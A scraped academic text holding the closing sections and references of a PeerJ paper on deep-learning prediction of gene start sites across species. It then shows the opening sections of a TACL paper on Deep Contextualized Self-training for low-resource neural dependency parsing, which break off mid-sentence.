apply models trained on each one’s other chromosomes to its own and the other one’s X chromosome. While the sequence of this chromosome has evolved differently in both species, many genes are homologous (Sinha & Meller, 2007). The fact that we are able to recover GSS in mouse/human with a model trained on the other organism suggests that the machinery capable of recognising GSS in each organism is overall conserved. We also show that this methodology can be applied to more distant species, and use as examples chicken and zebrafish. Our results point toward a higher similarity between mammal and chicken while zebrafish GSS cannot cannot be reliably predicted with models trained on mammal and chicken sequences. While the genome sequence conservation can be computed directly from DNA sequences, further developments of our method may provide a new tool to quantify more complex patterns of similarity between different organism’s nuclear machinery that interprets DNA sequences in vivo. ACKNOWLEDGEMENTS We would like to thank Léopold Carron for helping us with datasets, Hugues Roest Croeluis for discussions, Michel Quaggetto for technical support and Annick Lesne for comments on the manuscript. We also wish to thank our editor James Procter and the two anonymous referees for their invaluable work. Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 14/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.278 ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Agence Nationale pour la Recherche [HiResBac ANR- 15-CE11-0023-03]. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Agence Nationale pour la Recherche [HiResBac ANR-15-CE11-0023-03]. Competing Interests The authors declare there are no competing interests. Author Contributions • Ghazaleh Khodabandelou conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Etienne Routhier performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • Julien Mozziconacci conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Code is available at GitHub: https://github.com/StudyTSS/DeepTSS. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.278#supplemental-information. REFERENCES Abadi M, Agarwal A, Barham P. 2015. TensorFlow: large-scale machine learning on heterogeneous systems. Available at https://www.tensorflow.org/ . Alipanahi B, Delong A, Weirauch MT, Frey BJ. 2015. Predicting the sequence speci- ficities of DNA-and RNA-binding proteins by deep learning. Nature Biotechnology 33(8):831–838 DOI 10.1038/nbt.3300. Angermueller C, Pärnamaa T, Parts L, Stegle O. 2016. Deep learning for computational biology. Molecular Systems Biology 12(7):878–884 DOI 10.15252/msb.20156651. Batista GE, Prati RC, Monard MC. 2004. A study of the behavior of several methods for balancing machine learning training data. ACM SIGKDD Explorations Newsletter 6(1):20–29 DOI 10.1145/1007730.1007735. Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 15/18 https://peerj.com https://github.com/StudyTSS/DeepTSS http://dx.doi.org/10.7717/peerj-cs.278#supplemental-information http://dx.doi.org/10.7717/peerj-cs.278#supplemental-information https://www.tensorflow.org/ http://dx.doi.org/10.1038/nbt.3300 http://dx.doi.org/10.15252/msb.20156651 http://dx.doi.org/10.1145/1007730.1007735 http://dx.doi.org/10.7717/peerj-cs.278 Carninci P, Sandelin A, Lenhard B, Katayama S, Shimokawa K, Ponjavic J, Semple CA, Taylor MS, Engström PG, Frith MC. 2006. Genome-wide analysis of mam- malian promoter architecture and evolution. Nature Genetics 38(6):626–635 DOI 10.1038/ng1789. Chawla NV, Japkowicz N, Kotcz A. 2004. Special issue on learning from imbalanced data sets. ACM Sigkdd Explorations Newsletter 6(1):1–6. Chicco D, Jurman G. 2020. The advantages of the Matthews correlation coefficient (MCC) over F1 score and accuracy in binary classification evaluation. BMC Ge- nomics 21(1):6. Ching T, Himmelstein DS, Beaulieu-Jones BK, Kalinin AA, Do BT, Way GP, Ferrero E, Agapow PM, Zietz M, Hoffman MM. 2018. Opportunities and obstacles for deep learning in biology and medicine. Journal of the Royal Society Interface 15(141):1–47 DOI 10.1098/rsif.2017.0387. Chollet F. 2015. Keras. Available at https://keras.io. Deaton AM, Bird A. 2011. CpG islands and the regulation of transcription. Genes & Development 25(10):1010–1022 DOI 10.1101/gad.2037511. Down TA, Hubbard TJ. 2002. Computational detection and location of transcrip- tion start sites in mammalian genomic DNA. Genome Research 12(3):458–461 DOI 10.1101/gr.216102. Durham TJ, Libbrecht MW, Howbert JJ, Bilmes J, Noble WS. 2018. PREDICTD parallel epigenomics data imputation with cloud-based tensor decomposition. Nature Communications 9(1):1–15 DOI 10.1038/s41467-017-02088-w. ENCODE Project Consortium. 2012. An integrated encyclopedia of DNA elements in the human genome. Nature 489(7414):57–74 DOI 10.1038/nature11247. Georgakilas GK, Perdikopanis N, Hatzigeorgiou A. 2020. Solving the transcrip- tion start site identification problem with ADAPT-CAGE: a machine learn- ing algorithm for the analysis of CAGE data. Scientific Reports 10(1):1–12 DOI 10.1038/s41598-019-56847-4. Goodfellow I, Bengio Y, Courville A. 2016. Deep learning. Cambridge: MIT Press. Han L, Su B, Li WH, Zhao Z. 2008. CpG island density and its correlations with genomic features in mammalian genomes. Genome Biology 9(5):1–12 DOI 10.1186/gb-2008-9-5-r79. He H, Garcia EA. 2009. Learning from imbalanced data. IEEE Transactions on Knowledge and Data Engineering 21(9):1263–1284 DOI 10.1109/TKDE.2008.239. Jaganathan K, Panagiotopoulou SK, McRae JF, Darbandi SF, Knowles D, Li YI, Kosmicki JA, Arbelaez J, Cui W, Schwartz GB. 2019. Predicting splicing from primary sequence with deep learning. Cell 176(3):535–548. Kelley DR, Reshef Y, Bileschi M, Belanger D, McLean CY, Snoek J. 2018. Sequential regulatory activity prediction across chromosomes with convolutional neural networks. Genome Research 28(5):739–750. Kelley DR, Snoek J, Rinn JL. 2016. Basset: learning the regulatory code of the accessible genome with deep convolutional neural networks. Genome Research 26(7):990–999 DOI 10.1101/gr.200535.115. Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 16/18 https://peerj.com http://dx.doi.org/10.1038/ng1789 http://dx.doi.org/10.1098/rsif.2017.0387 https://keras.io http://dx.doi.org/10.1101/gad.2037511 http://dx.doi.org/10.1101/gr.216102 http://dx.doi.org/10.1038/s41467-017-02088-w http://dx.doi.org/10.1038/nature11247 http://dx.doi.org/10.1038/s41598-019-56847-4 http://dx.doi.org/10.1186/gb-2008-9-5-r79 http://dx.doi.org/10.1109/TKDE.2008.239 http://dx.doi.org/10.1101/gr.200535.115 http://dx.doi.org/10.7717/peerj-cs.278 Kingma DP, Ba J. 2014. Adam: a method for stochastic optimization. ArXiv preprint. arXiv:1412.6980. Kreyszig E. 2009. Advanced engineering mathematics. 10th eddition. Wiley. Kugel JF, Goodrich JA. 2017. Finding the start site: redefining the human initiator element. Genes & Development 31(1):1–2 DOI 10.1101/gad.295980.117. Kundaje A, Meuleman W, Ernst J, Bilenky M, Yen A, Heravi-Moussavi A, Kheradpour P, Zhang Z, Wang J, Ziller MJ. 2015. Integrative analysis of 111 reference human epigenomes. Nature 518(7539):317–330 DOI 10.1038/nature14248. Leung MKK, Xiong HY, Lee LJ, Frey BJ. 2014. Deep learning of the tissue-regulated splicing code. Bioinformatics 30(12):i121–i129 DOI 10.1093/bioinformatics/btu277. Min X, Chen N, Chen T, Jiang R. 2016. DeepEnhancer: predicting enhancers by con- volutional neural networks. In: Bioinformatics and biomedicine (BIBM), 2016 IEEE international conference on. IEEE, 637–644. Pachganov S, Murtazalieva K, Zarubin A, Sokolov D, Chartier DR, Tatarinova TV. 2019. TransPrise: a novel machine learning approach for eukaryotic promoter prediction. PeerJ 7:e7990 DOI 10.7717/peerj.7990. Poplin R, Chang PC, Alexander D, Schwartz S, Colthurst T, Ku A, Newburger D, Dijamco J, Nguyen N, Afshar PT. 2018. A universal SNP and small-indel vari- ant caller using deep neural networks. Nature Biotechnology 36(10):983–987 DOI 10.1038/nbt.4235. Rivera CM, Ren B. 2013. Mapping human epigenomes. Cell 155(1):39–55 DOI 10.1016/j.cell.2013.09.011. Rumelhart DE, Hinton GE, Williams RJ. 1986. Learning representations by back- propagating errors. Nature 323(6088):533–536 DOI 10.1038/323533a0. Sandelin A, Carninci P, Lenhard B, Ponjavic J, Hayashizaki Y, Hume DA. 2007. Mammalian RNA polymerase II core promoters: insights from genome-wide studies. Nature Reviews Genetics 8(6):424–436. Sinha AU, Meller J. 2007. Cinteny: flexible analysis and visualization of synteny and genome rearrangements in multiple organisms. BMC Bioinformatics 8(1):82 DOI 10.1186/1471-2105-8-82. Srivastava N, Hinton G, Krizhevsky A, Sutskever I, Salakhutdinov R. 2014. Dropout: a simple way to prevent neural networks from overfitting. The Journal of Machine Learning Research 15(1):1929–1958. Stein L. 2001. Genome annotation: from sequence to biology. Nature Reviews Genetics 2(7):493–503. Umarov RK, Solovyev VV. 2017. Recognition of prokaryotic and eukaryotic promoters using convolutional deep learning neural networks. PLOS ONE 12(2):e0171410 DOI 10.1371/journal.pone.0171410. Vavouri T, Lehner B. 2012. Human genes with CpG island promoters have a distinct transcription-associated chromatin organization. Genome Biology 13(11):1–12 DOI 10.1186/gb-2012-13-11-r110. Wainberg M, Merico D, Delong A, Frey BJ. 2018. Deep learning in biomedicine. Nature Biotechnology 36(9):829 DOI 10.1038/nbt.4233. Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 17/18 https://peerj.com http://arXiv.org/abs/1412.6980 http://dx.doi.org/10.1101/gad.295980.117 http://dx.doi.org/10.1038/nature14248 http://dx.doi.org/10.1093/bioinformatics/btu277 http://dx.doi.org/10.7717/peerj.7990 http://dx.doi.org/10.1038/nbt.4235 http://dx.doi.org/10.1016/j.cell.2013.09.011 http://dx.doi.org/10.1038/323533a0 http://dx.doi.org/10.1186/1471-2105-8-82 http://dx.doi.org/10.1371/journal.pone.0171410 http://dx.doi.org/10.1186/gb-2012-13-11-r110 http://dx.doi.org/10.1038/nbt.4233 http://dx.doi.org/10.7717/peerj-cs.278 Waterston RH, Lindblad-Toh K, Birney E, Rogers J, Abril JF, Agarwal P, Agar- wala R, Ainscough R, Alexandersson M, An P. 2002. Initial sequencing and comparative analysis of the mouse genome. Nature 420(6915):520–562 DOI 10.1038/nature01262. Wesolowska-Andersen A, Yu GZ, Nylander V, Abaitua F, Thurner M, Torres JM, Mahajan A, Gloyn AL, McCarthy MI. 2020. Deep learning models predict regulatory variants in pancreatic islets and refine type 2 diabetes association signals. eLife 9:e51503 DOI 10.7554/eLife.51503. Zhou J, Troyanskaya OG. 2015. Predicting effects of noncoding variants with deep learning–based sequence model. Nature Methods 12(10):931–934 DOI 10.1038/nmeth.3547. Zou J, Huss M, Abid A, Mohammadi P, Torkamani A, Telenti A. 2019. A primer on deep learning in genomics. Nature Genetics 51(1):12–18. Khodabandelou et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.278 18/18 https://peerj.com http://dx.doi.org/10.1038/nature01262 http://dx.doi.org/10.7554/eLife.51503 http://dx.doi.org/10.1038/nmeth.3547 http://dx.doi.org/10.7717/peerj-cs.278 work_q3s75ybxv5gppoolp5qemw6apq ---- Deep Contextualized Self-training for Low Resource Dependency Parsing Guy Rotman and Roi Reichart Faculty of Industrial Engineering and Management, Technion, IIT grotman@campus.technion.ac.il roiri@ie.technion.ac.il Abstract Neural dependency parsing has proven very effective, achieving state-of-the-art results on numerous domains and languages. Unfortunately, it requires large amounts of labeled data, which is costly and laborious to create. In this paper we propose a self- training algorithm that alleviates this anno- tation bottleneck by training a parser on its own output. Our Deep Contextualized Self-training (DCST) algorithm utilizes representation models trained on sequence labeling tasks that are derived from the parser’s output when applied to unlabeled data, and integrates these models with the base parser through a gating mech- anism. We conduct experiments across multiple languages, both in low resource in-domain and in cross-domain setups, and demonstrate that DCST substantially out- performs traditional self-training as well as recent semi-supervised training methods.1 1 Introduction Deep neural networks (DNNs) have improved the state-of-the-art in a variety of NLP tasks. These include dependency parsing (Dozat and Manning, 2017), semantic parsing (Hershcovich et al., 2017), named entity recognition (Yadav and Bethard, 2018), part of speech (POS) tagging (Plank and Agić, 2018), and machine translation (Vaswani et al., 2017), among others. Unfortunately, DNNs rely on in-domain labeled training data, which is costly and laborious to achieve. This annotation bottleneck limits the applicability of NLP technology to a small number of languages and domains. It is hence not a surprise that substantial recent research efforts have been 1Our code is publicly available at https://github. com/rotmanguy/DCST. devoted to DNN training based on both labeled and unlabeled data, which is typically widely available (§ 2). A prominent technique for training machine learning models on labeled and unlabeled data is self-training (Yarowsky, 1995; Abney, 2004). In this technique, after the model is trained on a labeled example set it is applied to another set of unlabeled examples, and the automatically and manually labeled sets are then combined in order to re-train the model—a process that is sometimes performed iteratively. Although self-training has shown useful for a variety of NLP tasks, its success for deep learning models has been quite limited (§ 2). Our goal is to develop a self-training algorithm that can substantially enhance DNN models in cases where labeled training data are scarce. Particularly, we are focusing (§ 5) on the lightly supervised setup where only a small in-domain labeled dataset is available, and on the domain adaptation setup where the labeled dataset may be large but it comes from a different domain than the one to which the model is meant to be applied. Our focus task is dependency parsing, which is essential for many NLP tasks (Levy and Goldberg, 2014; Angeli et al., 2015; Toutanova et al., 2016; Hadiwinoto and Ng, 2017; Marcheggiani et al., 2017), but where self-training has typically failed (§ 2). Moreover, neural dependency parsers (Kiperwasser and Goldberg, 2016; Dozat and Manning, 2017) substantially outperform their linear predecessors, which makes the develop- ment of self-training methods that can enhance these parsers in low-resource setups a crucial challenge. We present a novel self-training method, suit- able for neural dependency parsing. Our algorithm (§ 4) follows recent work that has demonstrated the power of pre-training for improving DNN models in NLP (Peters et al., 2018; Devlin et al., 2019) 695 Transactions of the Association for Computational Linguistics, vol. 7, pp. 695–713, 2019. https://doi.org/10.1162/tacl a 00294 Action Editor: Yue Zhang. Submission batch: 7/2019; Revision batch: 9/2019; Published 12/2019. c© 2019 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 https://github.com/rotmanguy/DCST https://github.com/rotmanguy/DCST https://doi.org/10.1162/tacl_a_00294 and particularly for domain adaptation (Ziser and Reichart, 2018). However, whereas in previous work a representation model, also known as a contextualized embedding model, is trained on a language modeling related task, our algorithm utilizes a representation model that is trained on sequence prediction tasks derived from the parser’s output. Our representation model and the base parser are integrated into a new model through a gating mechanism, and the resulting parser is then trained on the manually labeled data. We experiment (§ 6,7) with a large variety of lightly supervised and domain adaptation depen- dency parsing setups. For the lightly supervised case we consider 17 setups: 7 in different English domains and 10 in other languages. For the domain adaptation case we consider 16 setups: 6 in differ- ent English domains and 10 in 5 other languages. Our Deep Contextualized Self-training (DCST) algorithm demonstrates substantial performance gains over a variety of baselines, including tradi- tional self-training and the recent cross-view train- ing approach (CVT) (Clark et al., 2018) that was designed for semi-supervised learning with DNNs. 2 Previous Work Self-training in NLP Self-training has shown useful for various NLP tasks, including word sense disambiguation (Yarowsky, 1995; Mihalcea, 2004), bilingual lexicon induction (Artetxe et al., 2018), neural machine translation (Imamura and Sumita, 2018), semantic parsing (Goldwasser et al., 2011), and sentiment analysis (He and Zhou, 2011). For constituency parsing, self- training has shown to improve linear parsers both when considerable training data are available (McClosky et al., 2006a,b), and in the lightly supervised and the cross-domain setups (Reichart and Rappoport, 2007). Although several authors failed to demonstrate the efficacy of self-training for dependency parsing (e.g., Rush et al., 2012), recently it was found useful for neural dependency parsing in fully supervised multilingual settings (Rybak and Wróblewska, 2018). The impact of self-training on DNNs is less researched compared with the extensive investi- gation with linear models. Recently, Ruder and Plank (2018) evaluated the impact of self-training and the closely related tri-training method (Zhou and Li, 2005; Søgaard, 2010) on DNNs for POS tagging and sentiment analysis. They found self-training to be effective for the sentiment classification task, but it failed to improve their BiLSTM POS tagging architecture. Tri-training has shown effective for both the classification and the sequence tagging task, and in Vinyals et al. (2015) it has shown useful for neural constituency parsing. This is in-line with Steedman et al. (2003), who demonstrated the effectiveness of the closely related co-training method (Blum and Mitchell, 1998) for linear constituency parsers. Lastly, Clark et al. (2018) presented the CVT algorithm, a variant of self-training that uses unsupervised representation learning. CVT differs from classical self-training in the way it exploits the unlabeled data: It trains auxiliary models on restricted views of the input to match the predictions of the full model that observes the whole input. We propose a self-training algorithm based on deep contextualized embeddings, where the embedding model is trained on sequence tagging tasks that are derived from the parser’s output on unlabeled data. In extensive lightly supervised and cross-domain experiments with a neural dependency parser, we show that our DCST algorithm outperforms traditional self-training and CVT. Pre-training and Deep Contextualized Embed- ding Our DCST algorithm is related to recent work on DNN pre-training. In this line, a DNN is first trained on large amounts of unlabeled data and is then used as the word embedding layer of a more complex model that is trained on labeled data to perform an NLP task. Typically, only the upper, task-specific, layers of the final model are trained on the labeled data, while the parameters of the pre-trained embedding network are kept fixed. The most common pre-training task is language modeling or a closely related variant (McCann et al., 2017; Peters et al., 2018; Ziser and Reichart, 2018; Devlin et al., 2019). The outputs of the pre-trained DNN are often referred to as contextualized word embeddings, as these DNNs typically generate a vector embedding for each input word, which takes its context into account. Pre-training has led to performance gains in many NLP tasks. Recently, Che et al. (2018) incorporated ELMo embeddings (Peters et al., 2018) into a neural dependency parser and reported improvements 696 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 over a range of Universal Dependency (UD) (McDonald et al., 2013; Niver et al., 2016, 2018) languages in the fully supervised setup. In this paper we focus on the lightly supervised and domain adaptation setups, trying to compensate for the lack of labeled data by exploiting auto- matically labeled trees generated by the base parser for unlabeled sentences. Our main experiments (§7) are with models that utilize non-contextualized word embeddings. We believe this is a more practical setup when considering multiple languages and domains. Indeed, Che et al. (2018), who trained their ELMo model on the unlabeled data of the CoNLL 2018 shared task, reported that "The training of ELMo on one language takes roughly 3 days on an NVIDIA P100 GPU." However, we also demonstrate the power of our models when ELMo embeddings are available (§8), in order to establish the added impact of deep contextual- ized self-training on top of contextualized word embeddings. Lightly Supervised Learning and Domain Adaptation for Dependency Parsing Finally, we briefly survey earlier attempts to learn parsers in setups where labeled data from the domain to which the parser is meant to be applied is scarce. We exclude from this brief survey literature that has already been mentioned above. Some notable attempts are: exploiting short dependencies in the parser’s output when applied to large target domain unlabeled data (Chen et al., 2008), adding inter-sentence consistency constra- ints at test time (Rush et al., 2012), selecting effec- tive training domains (Plank and Van Noord, 2011), exploiting parsers trained on different do- mains through a mixture of experts (McClosky et al., 2010), embedding features in a vector space (Chen et al., 2014), and Bayesian averaging of a range of parser parameters (Shareghi et al., 2019). Recently, Sato et al. (2017) presented an adversarial model for cross-domain dependency parsing in which the encoders of the source and the target domains are integrated through a gating mechanism. Their approach requires target do- main labeled data for parser training and hence it cannot be applied in the unsupervised domain adaptation setup we explore (§ 5). We adopt their gating mechanism to our model and extend it to integrate more than two encoders into a final model. Figure 1: The BiAFFINE parser. 3 Background: The BiAFFINE Parser The parser we utilize in our experiments is the BiAFFINE parser (Dozat and Manning, 2017). Because the structure of the parser affects our DCST algorithm, we briefly describe it here. A sketch of the parser architecture is provided in Figure 1. The input to the parser is a sentence (x1, x2, . . . , xm) of length m. An embedding layer embeds the words into fixed-size vectors (w1, w2, . . . , wm). Additionally, character-level embeddings ckt retrieved from a CNN (Zhang et al., 2015), and a POS embedding pt, are concatenated to each word vector. At time t, the final input vector ft = [wt; ct; pt] is then fed into a BiLSTM encoder Eparser that outputs a hidden representation ht: ht = Eparser(ft). (1) Given the hidden representations of the i’th word hi and the j’th word hj , the decoder outputs a score si,j, indicating the model belief that the latter should be the head of the former in the dependency tree. More formally, si,j = r T i Urj + w T j rj, (2) where ri = MLP(hi), and U and wj are learned parameters (MLP is a multi-layered perceptron). Similarly, a score li,j,k is calculated for the k’th possible dependency label of the arc (i, j): li,j,k = q T i U ′ kqj + w ′T k [qi; qj] + b ′ k, (3) where qi = MLP ′ (hi), and U ′ k, w ′ k, and b ′ k are learned parameters. During training the model aims to maximize the probability of the gold tree: m∑ i=1 p(yi|xi, θ) + p(y′i|xi, yi, θ), (4) 697 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 Algorithm 1 Deep Contextualized Self-training (DCST) Input: Labeled data L, Unlabeled data U Algorithm: 1. Train the base parser on L (§ 3). 2. Parse the sentences of U with the base parser. 3. Transform the automatically parsed trees of U to one or more word-level tagging schemes (§ 4.1). 4. Train (a) contextualized embedding model(s) to predict the word-level tagging(s) of U (§ 4.1). 5. Integrate the representation model(s) of step 4 with the base parser, and train the resulting parser on L (§ 4.2). where yi is the head of xi, y′i is the label of the arc (xi, yi), θ represents the model’s parameters, p(yi|xi, θ) ∝ exp(sxi,yi), and p(y′i|xi, yi, θ) ∝ exp(lxi,yi,y′i). At test time, the parser runs the MST algorithm (Edmonds, 1967) on the arc scores in order to generate a valid tree. 4 Deep Contextualized Self-training In this section we present our DCST algorithm for dependency parsing (Algorithm 1). As a semi- supervised learning algorithm, DCST assumes a labeled dataset L = {(xli, yli)} |L| i=1, consisting of sentences and their gold dependency trees, and an unlabeled dataset U = {xui } |U| i=1, consisting of sentences only. We start (Algorithm 1, step 1) by training the base parser (the BiAFFINE parser in our case) on the labeled dataset L. Once trained, the base parser can output a dependency tree for each of the unlabeled sentences in U (step 2). We then transform the automatic dependency trees generated for U into one or more word-level tagging schemes (step 3). In § 4.1 we elaborate on this step. Then, we train a BiLSTM sequence tagger to predict the word- level tags of U (step 4). If the automatic parse trees are transformed to more than one tagging scheme, we train multiple BiLTMs—one for each scheme. Finally, we construct a new parser by integrating the base parser with the representation BiLSTM(s), and train the final parser on the labeled dataset L (step 5). At this stage, the base parser parameters are randomly initialized, while the parameters of the representation BiLSTM(s) are initialized to those learned in step 4. We next discuss the three word-level tagging schemes derived from the dependency trees (step 3), and then the gating mechanism utilized in order to compose the hybrid parser (step 5). 4.1 Representation Learning (Steps 3 and 4) In what follows we present the three word-level tagging schemes we consider at step 3 of the DCST algorithm. Transferring the parse trees into tagging schemes is the key for populating information from the original (base) parser on unlabeled data, in a way that can later be re-encoded to the parser through its word embedding layers. The key challenge we face when implementing this idea is the transformation of dependency trees into word level tags that preserve important aspects of the information encoded in the trees. We consider tagging schemes that maintain various aspects of the structural information encoded in the tree. Particularly, we start from two tagging schemes that even if fully predicted still leave ambiguity about the actual parse tree: the number of direct dependants each word has and the distance of each word from the root of the tree. We then consider a tagging scheme, referred to as the Relative POS-based scheme, from which the dependency tree can be fully reconstructed. While other tagging schemes can definitely be proposed, we believe that the ones we consider here span a range of possibilities that allows us to explore the validity of our DCST framework. More specifically, the tagging schemes we consider are defined as follows: Number of Children Each word is tagged with the number of its children in the dependency tree. We consider only direct children, rather than other descendants, which is equivalent to counting the number of outgoing edges of the word in the tree. Distance from the Root Each word is tagged with its minimal distance from the root of the tree. For example, if the arc (ROOT , j) is included in the tree, the distance of the j’th word from the ROOT is 1. Likewise, if (ROOT , j) is not included but (ROOT, i) and (i, j) are, then j’th distance is 2. Relative POS-based Encoding Each word is tagged with its head word according to the relative POS-based scheme (Spoustová and Spousta, 2010; Strzyz et al., 2019) The head of a word is encoded by a pair (p, e) ∈ P × [−m + 1, m − 1], where P is the set of all possible parts of speech and m is the sentence length. For a positive (negative) number e and a POS p, the pair indicates that the head of the represented word is the e’th word to its right (left) with the POS tag p. To avoid sparsity 698 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 Figure 2: The sequence tagger applied to automatically parsed sentences in U (Algorithm 1, step 4). The tagger predicts for each word its label according to one of the three tagging schemes: Number of Children (blue), Distance from the Root (red), and Relative POS-based Encoding (black). The curved arrows sketch the gold dependency tree from which the word-level tags are derived. we coarsen the POS tags related to nouns, proper names, verbs, adjectives, punctuation marks, and brackets into one tag per category. Although this word-level tagging scheme was introduced as means of formulating dependency parsing as a sequence tagging task, in practice sequence models trained on this scheme are not competitive with state-of-the-art parsers and often generate invalid tree structures (Strzyz et al., 2019). Here we investigate the power of this scheme as part of a self-training algorithm. The Sequence Tagger Our goal is to encode the information in the automatically parsed trees into a model that can be integrated with the parser at later stages. This is why we choose to transform the parse trees into word-level tagging schemes that can be learned accurately and efficiently by a sequence tagger. Note that efficiency plays a key role in the lightly supervised and domain adaptation setups we consider, as large amounts of unlabeled data should compensate for the lack of labeled training data from the target domain. We hence choose a simple sequence tagging architecture, depicted in Figure 2. The encoder Etgr is a BiLSTM, similarly to Eparser of the parser. The decoder is composed of two fully connected layers with dropout (Srivastava et al., 2014) and an exponential linear unit activation Figure 3: An illustration of the hybrid parser with three auxiliary sequence taggers. An input word vector is passed through the parser encoder (E(1)parser) and the three pre-trained tagger encoders (E(2)tgr − E(4)tgr). The gating mechanism (Gate) computes a weighted average of the hidden vectors. Finally, the output of the gating mechanism is passed to the BiAFFINE decoder to predict the arc and label scores for each word pair. function (Clevert et al., 2016), followed by a final softmax layer that outputs the tag probabilities. 4.2 The Final Hybrid Parser (Step 5) In step 5, the final step of Algorithm 1, we integrate the BiLSTM of the sequence tagger, which encodes the information in the automatically generated dependency trees, with the base parser. Importantly, when doing so we initialize the BiLSTM weights to those to which it converged at step 4. The parameters of the base (BiAFFINE) parser, in contrast, are randomly initialized. The resulting hybrid parser is then trained on the labeled data in L. This way, the final model integrates the information from both L and the automatic tagging of U, generated in step 2 and 3. We next describe how the encoders of the sequence tagger and the BiAFFINE parser, Etgr and Eparser, are integrated through a gating mechanism, similar to that of Sato et al. (2017). The Gating Mechanism Given an input word vector ft (§ 3), the gating mechanism learns to scale between the BiLSTM encoder of the parser to that of the sequence tagger (Figure 3): at = σ(Wg[Eparser(ft); Etgr(ft)] + bg), gt = at � Eparser(ft) + (1 − at) � Etgr(ft). where � is the element-wise product, σ is the sigmoid function, and Wg and bg are the gating 699 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 mechanism parameters. The combined vector gt is then fed to the parser’s decoder. Extension to n ≥ 2 Sequence Taggers We can naturally extend our hybrid parser to support n auxiliary taggers (see again Figure 3). Given n taggers trained on n different tagging schemes, the gating mechanism is modified to be: s (i) t = W (i) g [E (1) parser(ft); E (2) tgr(ft); . . . ; E (n+1) tgr (ft)] + b(i)g , a (i) t = exp(s (i) t )∑n+1 j=1 exp(s (j) t ) , gt = a (1) t � E(1)parser(ft) + n+1∑ i=2 a (i) t � E(i)tgr(ft). This extension provides a richer representation of the automatic tree structures, as every tagging scheme captures a different aspect of the trees. Indeed, in most of our experiments, when integrating the base parser with our three proposed schemes, the resulting model was superior to models that consider a single tagging scheme. 5 Evaluation Setups This paper focuses on exploiting unlabeled data in order to improve the accuracy of a supervised parser. We expect this approach to be most useful when the parser does not have sufficient labeled data for training, or when the labeled training data do not come from the same distribution as the test data. We hence focus on two setups: The Lightly Supervised In-domain Setup In this setup we are given a small labeled dataset L = {(xli, yli)} |L| i=1 of sentences and their gold dependency trees and a large unlabeled dataset U = {(xui )} |U| i=1 of sentences coming from the same domain, where |L| � |U|. Our goal is to parse sentences from the domain of L and U. The Unsupervised Domain Adaptation Setup In this setup we are given a labeled source domain dataset L = {(xli, yli)} |L| i=1 of sentences and their gold dependency trees, and an unlabeled dataset U = {(xui )} |U| i=1 of sentences from a different target domain. Unlike the lightly-supervised setup, here L may be large enough to train a high-quality parser as long as the training and test sets come from the same domain. However, our goal here is to parse sentences from the target domain. 6 Experiments We experiment with the task of dependency parsing, in two setups: (a) lightly supervised in- domain and (b) unsupervised domain adaptation. Data We consider two datasets: (a) The English OntoNotes 5.0 (Hovy et al., 2006) corpus. This corpus consists of text from 7 domains: broadcast conversation (bc: 11877 training, 2115 development, and 2209 test sentences), broadcast news (bn: 10681, 1293, 1355), magazine (mz: 6771, 640, 778), news (nw: 34967, 5894, 2325), bible (pt: 21518, 1778, 1867), telephone conversation (tc: 12889, 1632, 1364), and Web (wb: 15639, 2264, 1683).2 The corpus is annotated with constituency parse trees and POS tags, as well as other labels that we do not use in our experiments. The constituency trees were converted to dependency trees using the Elitcloud conversion tool.3 In the lightly supervised setup we experiment with each domain separately. We further utilize this corpus in our domain adaptation experiments. (b) The UD dataset (McDonald et al., 2013; Nivre et al., 2016, 2018). This corpus contains more than 100 corpora of over 70 languages, annotated with dep- endency trees and universal POS tags. For the lightly supervised setup we chose 10 low-resource languages that have no more than 10K training sentences: Old Church Slavonic (cu), Danish (da), Persian (fa), Indonesian (id), Latvian (lv), Slovenian (sl), Swedish (sv), Turkish (tr), Urdu (ur), and Vietnamese (vi), and performed mono- lingual experiments with each.4 For the domain adaptation setup we experiment with 5 languages, considering two corpora from different domains for each: Czech (cs fictree: fiction, cs pdt: news and science), Galician (gl ctg: science and legal, gl treegal: news), Italian (it isdt: legal, news and wiki, it postwita: social media), Romanian (ro nonstandard: poetry and bible, ro rrt: news, literature, science, legal and wiki), and Swedish (sv lines: literature and politics, sv talbanken: news and textbooks). Training Setups For the lightly supervised setup we performed experiments with the 7 OntoNotes 2We removed wb test set sentences where all words are POS tagged with ‘‘XX’’. 3https://github.com/elitcloud/elit-java. 4In case a language has multiple corpora, our training, development and test sets are concatenations of the corresponding sets in these corpora. 700 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00294 by Carnegie Mellon University user on 06 April 2021 https://github.com/elitcloud/elit-java domains and the 10 UD corpora, for a total of 17 in-domain setups. For each setup we consider three settings that differ from each other in the size of the randomly selected labeled training and development sets: 100, 500, or 1000.5 We use the original test sets for evaluation, and the remaining training and development sentences as unlabeled data. For the English unsupervised domain adaptation setup, we consider the news (nw) section of Onto- Notes 5.0 as the source domain, and the remaining sections as the target domains. The nw training and development sets are used for the training and development of the parser, and the unlabeled versions of the target domain training and develop- ment sets are used for training and development of the representation model. The final model is evaluated on the target domain test set. Similarly, for unsupervised domain adaptation with the 